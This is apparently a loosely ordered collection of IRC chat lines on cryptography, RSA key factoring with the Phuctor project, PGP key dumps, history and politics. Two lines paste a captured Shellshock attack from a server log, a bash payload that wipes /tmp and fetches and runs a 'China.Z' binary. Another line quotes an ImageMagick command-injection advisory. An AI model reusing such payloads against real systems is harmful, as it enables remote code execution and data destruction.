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asciilifeform: it is purely an exercise in 'this stumps me, ergo it is cryptographically hard'
asciilifeform: all we have is a) otp, trivially proven to be impenetrable, high school level exercise b) everything else, being snake oils of varying degrees of toxicity, with c-s being the least noxious known to me presently.
asciilifeform: an adult asymmetric (or symmetric, for that matter) cryptosystem would rely on a mathematical problem of PROVEN complexity class (e.g., np-complete)
asciilifeform: (and i will add that no public implementation wrote it correctly, either.)
asciilifeform: Framedragger: but i ought to emphasize for n00bs, cramer-shoup is merely the healthiest horse at this glue factory.
asciilifeform: trinque: i implemented as per your recipe, it ought to work now ?
asciilifeform: this apparently is an actual thing, some folks were taken down from the trees by mistake, and cannot handle any timed process more complicated than skinning banana
asciilifeform: as a boy i always imagined that chinese parade includes blokes carrying little stools from which they will - together, and seismically calamitously - jump !
asciilifeform: dun like this standard? complain to god of war, not me.
asciilifeform: i don't expect to find a massively improved commercial server anywhere, for the reasons mircea_popescu described.
asciilifeform: (not saying the no-secrets-save-for-sshkey phuctor box is comparable, but simply for argument)
asciilifeform: mircea_popescu: would you tolerate mpex on a box like this ?
asciilifeform: and i imagine it must suck to be the owner of a real airplane landed on cargo cult island, it will promptly be ripped apart for parts to decorate straw planes the moment you look away
asciilifeform: phf: you reminded me of sov legend of some bloke who bought up a buncha 'deficit' bookz, e.g., complete dumas, and put an iron railroad bolt through the stack and then put on shelf, so guests wouldn't try to borrow'em
asciilifeform: relatedly, and hilariously, in sov era, the phrase 'classical education' meant, to educated folks, the imperial ru gymnasium, per old euro spec, with latin and greek. and ~all of the great ru writers, INCLUDING sov era, had this education, were old enough. whereas TODAY 'classical education' in ru refers to sov era school !
asciilifeform: and if it were the year 1850 and a letter that comes in can be presumed to be from a learned gentlemen simply by virtue of being a letter,
asciilifeform: they impose a different kind of cost on trilema.
asciilifeform: to clarify, i am not 'in love with paper' so much as with 'paper whose untampered age i can smell with my nose'
asciilifeform: the rats dampen ~new~ developments.
asciilifeform: << where do you find this implication ?
asciilifeform: there is also another cost imposed by sewer rats, that is not solvable by technical means
asciilifeform: the sewer rats impose a considerable cost on thinking folk just by being there.
asciilifeform: but i find it hard to see how it is not obvious that 'every sewer rat can publish' is a considerable damper on culture
asciilifeform: long ago i wrote an article re the undisputably higher quality of hardware products vs software, on account of the impossibility of patching hardware
asciilifeform: diana_coman: i am most sympathetic to precisely the 'anyone-can-print killed the book' argument.
asciilifeform: << dunno if you missed it BingoBoingo, but theoretically i could leave the swamp now.
asciilifeform not looking forward to reswamping
asciilifeform has most of a day before going back to the swamplandz
asciilifeform: all else is, to borrow from feinman, 'stamp collecting '...
asciilifeform owns the man's complete printed crackpot worx
asciilifeform: to me algebratron is ~half the point of even MAKING computer at all.
asciilifeform: ah at last actual computer.
asciilifeform: mircea_popescu: there's stats and there's stats. avg plane jumper is quite as flat as median jumper...
asciilifeform: all he couldn't do is ~sell it on mpex~, legitly
asciilifeform: which is likewise why not having mpex acct never especially bothered me.
asciilifeform: mp_at_olivos: recall naggum's layout
asciilifeform: woah mp on a heathen machine
asciilifeform: simply that the man is likely laughing all the way to the fiatolade fountain with his 670.
asciilifeform: how could he lift the assets if mp was treasurer ?
asciilifeform: i wanna see mp tour nazitown
asciilifeform: when do we get mp_at_barriloche ?
asciilifeform: $up mp_at_olivos
asciilifeform: <kakobrekla> its how i implemented some of the anti-ddos features - need logs for that
asciilifeform: well recall, i recently learned that nsa has blanket license to piss on 'equal employment' crapolade
asciilifeform: what's the man gonna do if he decides 60k is chump change ? defect to zimbabwe instead ?
asciilifeform: well the interesting bit, iirc, is that it was not 'job interview' in the customary sense, usg had no intention of actually using the fella in the stated capacity, they simply wanted a plausible-looking piece of shit to 'hangout leak' to ir. so they took his, and munged the component values for good measure
asciilifeform: the example currently in my head is the ru nuke detonator bloke
asciilifeform: 'emptied', to somebody running agents, is sort of same as empty applied to bottle of vodka - yes, '40 drops rule', you can keep shaking it and get >0 output almost asymptotically infinitely - but at some point the expense of the effort is > yield
asciilifeform: recall usa pumping out the ru maths, physics, etc folks ?
asciilifeform: the italian painting example actually rings a bell
asciilifeform: in so far as i can tell from my pit, they only need usd, and only need it because of an elaborate chumpatron which encompasses ~everyone
asciilifeform: i don't recall the shithub keys dump having yet been thrown in
asciilifeform: and when it is, we'll simply bernstein in 2 processed, one just with 8ball.
asciilifeform: (treating any key differently from any other would substantially complicate the mechanism)
asciilifeform: ;;later tell phf your search box is not grep-compatible. srlsy for fucks sake i can't search for '3 divides' without getting a pile of rubbish
asciilifeform: megatonnes of old-school 'seals', 'tamper' whatevrthefucks
asciilifeform: birch is terrible example
asciilifeform: the perennial favourite example (as seen in, e.g., orlov, and elsewhere) is bacteria in agar
asciilifeform: bash -c \x22rm -rf /tmp/*;echo wget -O /tmp/China.Z-jkfz\xA8 >> /tmp/;echo echo By China.Z >> /tmp/;echo chmod 777 /tmp/China.Z-jkfz\xA8 >> /tmp/;echo /tmp/China.Z-jkfz\xA8 >> /tmp/;echo rm -rf /tmp/ >> /tmp/;chmod 777 /tmp/;/tmp/\x22" "-"
asciilifeform: - - [21/May/2016:16:49:40 +0000] "GET / HTTP/1.1" 200 1101 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget -O /tmp/China.Z-jkfz\xA8 >> /tmp/;echo echo By China.Z >> /tmp/;echo chmod 777 /tmp/China.Z-jkfz\xA8 >> /tmp/;echo /tmp/China.Z-jkfz\xA8 >> /tmp/;echo rm -rf /tmp/ >> /tmp/;chmod 777 /tmp/;/tmp/\x22" "() { :; }; /bin/
asciilifeform: i can picture the symptoms though.
asciilifeform: how does one know that a fella has compromised key ?
asciilifeform: iirc in the l0gz we learned that even straight usg has mpex account(s), and parked coin stolen from its prisoners (e.g., dpr) there.
asciilifeform: i can't speak for others, but a fella being drummed out of mpex with dekulakization is a newsworthy thing imho.
asciilifeform: at one point asciilifeform attempted to contribute to pediwikia, even. was quickly cured of the notion that this was a worthwhile use of time.
asciilifeform: mircea_popescu: the most complicated piece is the www crud
asciilifeform: try to understand how special cases make complexity of a proggy explode.
asciilifeform: in mircea_popescu's picture, is it simply that the termites have gnawed long enough at the support columns ?
asciilifeform: we were doing 'high throughput screening' of compounds from massive library of random crud
asciilifeform: likely it was used simply in manufacture
asciilifeform: the H-bomb. It symbolizes the banality of evil which is the essence of the whole H-bomb business. Workaday people doing workaday jobs building doomsday machines based on 1950's technology, while civilization marches bravely into the new millennium, oblivious to the death sentence imposed by a secret technology involving plastic foam. It calls to mind the most famous line from The Graduate, "One word: plastics."'
asciilifeform: Errata, which I dubbed "exploding styrofoam," the corresponding phrase would be "a gas of electrons." The implosion of the secondary is driven by matter pressure, not radiation pressure. Incidentally, Dow Chemical complained that Styrofoam is a trademark, like Xerox, and that nuclear weapons do not contain Styrofoam. Point conceded; the foam is generic. ... I like the idea of a nuisance material, plastic foam, as the real secret of
asciilifeform: i was specifically citing example of failed technologizing
asciilifeform: anyway i was not there, and cannot say how much the entire story was simply a cover for embezzling half a bil usd
asciilifeform: and eventually had to reverse-engineer old samples and found the missing 'gotta have trace elements x, y, z'
asciilifeform: as it turned out to have a hidden dependence on an impurity which was present in the feedstock at the time
asciilifeform: not simply scale.
asciilifeform: thus far thread seems to compress to a very discouraging ; mircea_popescu: 'me an' the other wizards got vastly moar powerful!1111' asciilifeform: 'waiwut how' mircea_popescu: 'yer puny brain will never apprehend the smallest part of it'
asciilifeform: but on the other hand it is not wholly impossible to write something meaningful and useful re mathematical creativity.
asciilifeform: there is a less comical example of this, historically - damascus steel.
asciilifeform: this formulation is simply a change of coordinate system
asciilifeform: but the reason i dun see the 'let's 3% tax' as a technical advance, is that it was not a deliberate act, but a concession to collapse of inca empire. it was done ~to~ the folks who did it, like an earthquake.
asciilifeform: not being timeless god on mt olympus, i generally don't do 'absolute firsts'
asciilifeform: all i see is complexity cancer, on which the usual scamvultures feast.
asciilifeform: what did n-way leveraged whateverthefucks improve ?
asciilifeform: << i'ma bite this bait. tell me, what constructive thing have improvements in finance in past 30y enabled ?
asciilifeform: finance as 'improved since 1980' is precisely chumpatronics.
asciilifeform: mircea_popescu: chumpatronics quite clearly moved forward! yes
asciilifeform: realize that 'golang' is not simply a language, but a set of libraries that is used by pretty much 100% of the extant soft implemented therein
asciilifeform: until very recently i used to think quite like mircea_popescu above, 'sure, i'll read even if implemented in js'
asciilifeform: mircea_popescu: on the contrary, there isn't a reference implementation.
asciilifeform: if anything, leverage pertaining to computer maxed out in '90s
asciilifeform: complexity of what ?
asciilifeform: BUT was restructured as a chumpatron some time quite recently (90s?)
asciilifeform: mircea_popescu: not a matter of temperament, matter of rank
asciilifeform: chump lists are valued at ~epsilon.
asciilifeform: glass ampoule, coated in ZnS inside
asciilifeform: do we have the sr dump churned ? (who was doing this?)
asciilifeform: at one point - in fact, until very recently - i would compulsively dig in and, weeks later, would, e.g., 'yet another google turd'
asciilifeform: and gossipd is considerably more general than a chat, it is to be a complete replacement for tcp/ip and packet switching as ordinarily understood.
asciilifeform: << important question that perhaps only mircea_popescu could answer: is there a 'background lactation' ?
asciilifeform: sorta implied in 'war' neh?
asciilifeform: hanbot: i showed up at 'balticon' a few times (where i even saw, by pure chance... the infamous eric raymond, limping along)
asciilifeform: having read none of the redditola that presumably prompted it
asciilifeform: 'The government said Monday he should remain jailed indefinitely until he complies. The authorities also said that it's not a violation of the man's Fifth Amendment right against compelled self-incrimination because it's a "foregone conclusion" that illegal porn is on the drives and that he is only being asked to unlock the drives, not divulge their passcodes.
asciilifeform: 'Jean Liu, Didi's president, is the daughter of Liu Chuanzhi, the politically connected founder of Chinese computer maker Lenovo Group Ltd (0992.HK).'
asciilifeform: 'Consistent with the requirements of our agreement with our source, our editors and reporters have carefully examined each document, redacted names of low-level functionaries and other information that could impose serious harm on innocent individuals, and given the NSA an opportunity to comment on the documents to be published (the NSA’s comments resulted in no redactions other than two names of relatively low-level employees that
asciilifeform: the latter - old mpb node spoken of last year
asciilifeform: and promptly ripped out
asciilifeform: but nobody does it for rentals that will be promptly shat in again by the usual clientele.
asciilifeform: (nobody needs to maintain empty thing)
asciilifeform: from the pov of the bezzle artists, empties are just as useful as filled units, they help to prop up price.
asciilifeform: it is just that it is ~impossible to rent a house anywhere else !
asciilifeform: irc is an ancient and simple protocol, and has pretty much 1 serious flaw
asciilifeform: but yes, they still have a good chunk of campus devoted to animals, and fields for 'test crop', etc.
asciilifeform: simpler than this, even, usgocracy has no provision for arbitrary cuts. given as anybody arbitrarily excluded from whatever ends up forming interest group, 'pumping his rights', etc. and buluceala.
asciilifeform: mircea_popescu: well no shit. but the usg variant specifically lacks a mechanism for 'you are competent but sorry we're out of jam'
asciilifeform: they ~will~ have one. it is, to use mircea_popescutronic terminology, simply a question of how thick the spiked club they will be raped with until submitting.
asciilifeform: the third type, included here for completeness, is 'spam school', a straight chumpatron perpetrated largely on uppity proles. formerly cornered by places like 'strayer' but now the big boiz are expanding into the market.
asciilifeform: these are not really schools in the ordinary sense. yes, you can take classes, but it is nearly impossible to flunk, and really admission to, e.g., yale, is equiv. of nomenklatura membership.
asciilifeform: the ottoman empire, iirc, never invented quotas.
asciilifeform: BingoBoingo: similar situation with 'jew quota' in su. 'officially' it never existed. in practice, any serious institute where the management did ~not~ quietly implement one, would rapidly turn ~80% jew and the brass would have to confront party official asking 'why are you running a synagogue here'
asciilifeform: somebody... (vaclav havel ?) had a spiffy essay, long ago, re how inca empires invariably fall into having a set of officiose idiocies, enumerated expressions like this.
asciilifeform: and oregon is piss poor example. better - klondike.
asciilifeform: yeah, factory, office, etc. still 'employs' the 10
asciilifeform: usa of the period was a culturally impoverished zimbabwe
asciilifeform: (and the 'macivory' product that sat in a 68k mac, was simply a card with the smbx cpu in it... no cables at all)
asciilifeform: the largest competitor, aha
asciilifeform: a smbx box actually contained not 1 but ~3~ computers
asciilifeform: fromphuctor: and if i don't ?
asciilifeform: fromphuctor: is it so hard to grasp that the very ~concept~ of a ca is broken ?
asciilifeform: fromphuctor: ssl/tls (and all pki systems of whatever form) is rubbish.
asciilifeform: $up fromphuctor
asciilifeform: aha. forgoing the nagant is quite a presumptious thing. 'i have somethng more to say in the world!1111'
asciilifeform: (you can buy it, even, on ebay, and for some reason the maker saw it fit to sand off the ic tops, implying that there is something to be gained from reversing...)
asciilifeform: at any rate ~temporary~ soldiering is quite a modern thing - old ru conscription was for 25y...
asciilifeform: when i went to ro i had to get 2 different stamps
asciilifeform: idea being that 'stateless' folk are 'victims' with 'rights' and you can't simply get that status artificially on own free will
asciilifeform: thing is, the boss in the link is not a complete idiot, so much as the mere fact of a 'harassment' suit can sink a small firm.
asciilifeform: special class of curves, a simple procedure was devised whereby the coeffi-
asciilifeform: 'The nontechnical industry representatives on the ANSI committee were impressed by the RSA argument. As the heated debate continued, the NSA representative left to make a phone call. When he returned, he announced that he was authorized to state that the NSA believed that ECC had sufficient security to be used for secure communications among all U.S. government agencies, including the Federal Reserv
asciilifeform: << they have a pgp packet dumper, but it seems to barf on anything i give it
asciilifeform: what if you have NO USE for chimps.
asciilifeform: recall the chimp cage in the zoo ?
asciilifeform: and you can feel entirely confident jumping with the parachute.
asciilifeform: complete with music
asciilifeform: 'They suggest that when people fly in economy class, their position in the social hierarchy becomes glaringly obvious. This fact is especially so if they have to walk through the first class section of the plane to get to their assigned space in a cramped hell.'
asciilifeform: $up fromphuctor
asciilifeform: suddenly the simplicity aspect would be lost.
asciilifeform: well recall , my vtron was incomplete in the aspect where it assumed that any leaf was pressable per se
asciilifeform: and to the extent v can be coaxed into behaving outside of this envelope, it is incomplete
asciilifeform: if it isn't, then it isn't complete.
asciilifeform: what was lulzier was that apparently 'top seeekrit' apparatchiks are not permitted to attend such shows, at least without special dispensation from company chekist
asciilifeform: 'Standards bureaucracies like the Linux Foundation (which consumed the Free Standards Group in its' ever-growing accretion disk years ago) happily document and add to this sort of complexity without ever trying to understand why it was there in the first place. 'Ken and Dennis leaked their OS into the equivalent of home because an RK05 disk pack on the PDP-11 was too small" goes whoosh over their heads.'
asciilifeform: 'The /bin vs /usr/bin split (and all the others) is an artifact of this, a 1970's implementation detail that got carried forward for decades by bureaucrats who never question _why_ they're doing things. It stopped making any sense before Linux was ever invented, for multiple reasons...'
asciilifeform: and aren't any kind of good company.
asciilifeform: likewise a large fraction of samples on vt don't even ~run there~
asciilifeform: mircea_popescu: a very large share of the samples on vt are 'not detected'
asciilifeform: May 06 12:50:33 <mircea_popescu>and in other "internet security" lulz, << what is notable about this sample ?
asciilifeform: i can't simply shit forth gold.
asciilifeform: with that in mind, i am good at a reasonable breadth of things, but again 99% of the employment in them, in as far as i can access, is usg.
asciilifeform: (there is an unknown percentage, to be fair, of 'nonemployment' work also, i.e. 0day market, overlapping with the 99, but i have - as previously discussed - no 'in' to it.)
asciilifeform: consider, 99+% of the employment in my field is raw usg.
asciilifeform: even simpler than there, they make exactly one $item and that's it.
asciilifeform: trick is that it works best if you have the duplicated thing done in ~improved~ way rather than ad-hoc
asciilifeform: the big deal is that a db that gets ~added to~ is not so simple as 'tree of 40 levels'
asciilifeform: BingoBoingo: confusing post, implies that the surplus is of euro - i.e. actual - cheese
asciilifeform: same thing employer's opinions have to do with a stinking bum's behaviour ?
asciilifeform: 'It was a mistake to agree to publish my post before I saw his– I assumed his post would simply be a signed message anybody could easily verify.'
asciilifeform: 'According to Farak, the "high" from the drug lasted approximately 8 to 10 hours. In addition, the drug gave her the desired effects that she had discovered in her research: "I felt amazing. It gave me energy. I felt more alert. I did not wish it but it gave me the pep I was looking for." Farak maintained that her work was not affected at the Lab but that the methamphetamine made her "more alert and
asciilifeform: 'The report said that the woman began taking the lab's so-called "standard" drugs, the ones purchased from drug companies as a control in testing. "Farak began to consume the Amherst Lab's standards on a fairly regular basis beginning in late 2004 or early 2005," according to the report. "The first standard she admitted to using was the methamphetamine standard, which was the largest or most volumin
asciilifeform: dump the cert plox ?
asciilifeform: hello fromphuctor
asciilifeform: $up fromphuctor
asciilifeform: '"Unlike disclosing passcodes, you are not compelled to speak or say what's 'in your mind' to law enforcement," Gidari said. "'Put your finger here' is not testimonial or self-incriminating."'
asciilifeform: '...authorities obtained a search warrant compelling the girlfriend of an alleged Armenian gang member to press her finger against an iPhone that had been seized...'
asciilifeform: the sheer... cheapness. of the attempt, is breathtaking.
asciilifeform: (being pumped in now, concurrently with the remnant of the old sks set)
asciilifeform: lel somehow i suspect that he is quite employed.
asciilifeform: i thought bock was posing as a comp sci prof
asciilifeform: alice () example com (and honestly it may be that these one comes from me,
asciilifeform: (bock claimed to have used sks dump, but his set diverges considerably)
asciilifeform: model has proven remarkably durable despite the constant wearying turmoil of exit-scams and hacks and as I write this in mid-July 2015, there seems to be little chance that things will change substantially soon. (If Tor hidden services are cracked, the DNMs will simply move to I2P or Freenet; if Bitcoin starts getting too easily tracked, transactions will be settled in Monero or another cryptocoin with better anonymity properties, et
asciilifeform: our factors are composites
asciilifeform: (your example)
asciilifeform: eh henninger's proggy from that site (straight implementation of bernstein) works.
asciilifeform: because what, he is a pashtun, never seen computer ?
asciilifeform: well, what, he did not run the keys through pgpdump? did not see the dates ?
asciilifeform: but yes the large numbers are composites, this is obvious in 5 seconds to a kindergartener
asciilifeform: mircea_popescu: better to chug it in on my end - impervious to www overload
asciilifeform: and pump.
asciilifeform: i'ma saw apart a recent sks dump this weekend.
asciilifeform: mircea_popescu: there is still 3 or 4 days worth of old sks archive, being pumped in.
asciilifeform: ''ImageMagick allows to process files with external libraries. This feature is called 'delegate'. It is implemented as a system() with command string ('command') from the config file delegates.xml with actual value for different params (input/output filenames etc). Due to insufficient %M param filtering it is possible to conduct shell command injection. One of the default delegate's command is used
asciilifeform: incidentally little birdie told me recently that nsa 'TAO' pisses on american nondiscrimination laws and never employs foreign-born folk
asciilifeform: long, long ago, when i was quite unemployed, i wrote to Βασιλεύς Βασιλέων, Βασιλεύων Βασιλευόντων and offered my services
asciilifeform: the thing sorta implies organization definitionally.
asciilifeform: but i initially popped it open thinking it'd be a simple port, like, e.g., gimp
asciilifeform: that other folk can simply... do it
ascii_butugychag: (on archive attempt)
ascii_butugychag: fromphuctor__: know that gnupg never used openssl.
ascii_butugychag: mircea_popescu: my point was that in nazi land i get ranked as simply a very lazy nazi who spends time on ???? rather than properly drilling with the other ss men
ascii_deadfiber: but even without it, still not impossible
ascii_deadfiber: if the only implementation of something were in js, it hasn't actually been implemented yet.
ascii_deadfiber: << understand what happens when you gcd against the 8ball - these are fat composites
ascii_deadfiber: << tempted to link this on front of phuctor
asciilifeform: $up fromphuctor__
asciilifeform: $up fromphuctor__
asciilifeform: but still impressive.
asciilifeform: $up fromphuctor__
asciilifeform: plox do not attempt to use for anything other than indexing on phuctor.
asciilifeform foiled in yet another escape attempt from butugychag.
asciilifeform: cyco: and before getting alarmed, download the key and compare to yours
asciilifeform: mircea_popescu: fact is, i'm approaching ~unemployable
asciilifeform: $up fromphuctor__
asciilifeform: but we get simple rubbish.
asciilifeform: $up fromphuctor_
asciilifeform: $up fromphuctor__
asciilifeform: $up fromphuctor_
asciilifeform: $up fromphuctor
asciilifeform: GyrosGeier: some of the keys (marked 'mirrored' under 'notes') were part of an organized flimflam campaign by an unknown (likely nsa) party exploiting the fact that old versions of pgp used the bottom 32 bits of a modulus as the fingerprint.
asciilifeform: $up fromphuctor_
asciilifeform: $up fromphuctor
asciilifeform: fromphuctor: it is nontrivial to convert ssh key to pgp key format.
asciilifeform: fromphuctor: for them.
asciilifeform: $up fromphuctor_
asciilifeform: $up fromphuctor__
asciilifeform: $up fromphuctor_
asciilifeform: witness the silence from the 'kompyoooter insekoooority' komyooniti.
asciilifeform: to search for the idiocy where a diddled or simpleminded pgptron wants to generate an n-bit key, and so it craps out a n/2-bit prime and then gets next prime after it and multiplies.
asciilifeform: (these show up as large composites, naturally, in the gcdification pairwise with the 8ball)
asciilifeform: - - [01/May/2016:21:01:09 +0000] "\x16\x03\x01\x00\xFF\x01\x00\x00\xFB\x03\x03W&Rp9\xCC\xC9>\xBC] <<<<< the other one, for completeness.
asciilifeform: well, not simply coat
asciilifeform: mod6: the baked-in presumption of webtardism is almost insulting
asciilifeform: (they need hv source, which in turn requires oscillator, which introduces nonrandom signal component; ~and~ tube wears with time)
asciilifeform: adlai: all it is, is primes 2 ... N (for some large N) turned into a phuctor-compatible gpg key
asciilifeform: << i dun have an mpex acct. so qntra shares are not mechanically convertible to coin.
asciilifeform: lation of 18 U.S.C. § 1030(a)(5), the media are protected computers that have been damaged without authorization and are located in five or more districts.'
asciilifeform: (new ones are still being pumped in from the old sks parse. about 200k left iirc)
